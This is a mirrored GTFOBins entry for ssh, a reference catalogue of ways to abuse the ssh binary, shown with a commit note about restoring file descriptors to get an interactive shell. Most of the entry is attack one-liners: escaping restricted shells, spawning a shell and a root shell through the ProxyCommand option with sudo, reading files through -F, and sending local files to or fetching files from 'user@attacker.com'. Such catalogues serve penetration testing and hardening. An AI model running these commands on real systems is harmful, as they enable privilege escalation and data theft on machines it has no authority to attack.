public-mirrors/GTFOBins.github.io
1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io synced 2024-10-23 00:57:56 +02:00
Code Issues Projects Releases Wiki Activity
9dc6a93e5b
GTFOBins.github.io/_gtfobins/ssh.md
Andrea Cardaci 8eaf595fe6 Make interactive execute whenever possible 
Here the trick is to restore those file descriptors (0, 1, 2) that have been
redirected (`dup2`) by the parent process.

First we need to determine which one has been redirected, for example by looking
at `ls -l /proc/$$/fd/`. Then we can use `0<&x`, `1>&x` or `2>&x` to restore 0,
1 or 2 respectively, where `x` is any file descriptor number that points to the
TTY.

It may happen that no file descriptor is unchanged, in that case we can use
`tty` to perform the redirection: sh <$(tty) >$(tty) 2>$(tty)
2018-09-07 01:11:06 +02:00

1002 B
Raw Blame History

functions
execute-interactive upload download file-read sudo-enabled
description code
Reconnecting may help bypassing restricted shells. ssh localhost $SHELL --noprofile --norc
description code
Spawn interactive shell through ProxyCommand option. ssh -o ProxyCommand=';sh 0<&2 1>&2' x
description code
Send local file to a SSH server. HOST=user@attacker.com RPATH=file_to_save LPATH=file_to_send ssh $HOST "cat > $RPATH" < $LPATH
description code
Fetch a remote file from a SSH server. HOST=user@attacker.com RPATH=file_to_get LPATH=file_to_save ssh $HOST "cat $RPATH" > $LPATH
description code
The read file content is corrupted by error prints. LFILE=file_to_read ssh -F $LFILE localhost
description code
Spawn interactive root shell through ProxyCommand option. sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x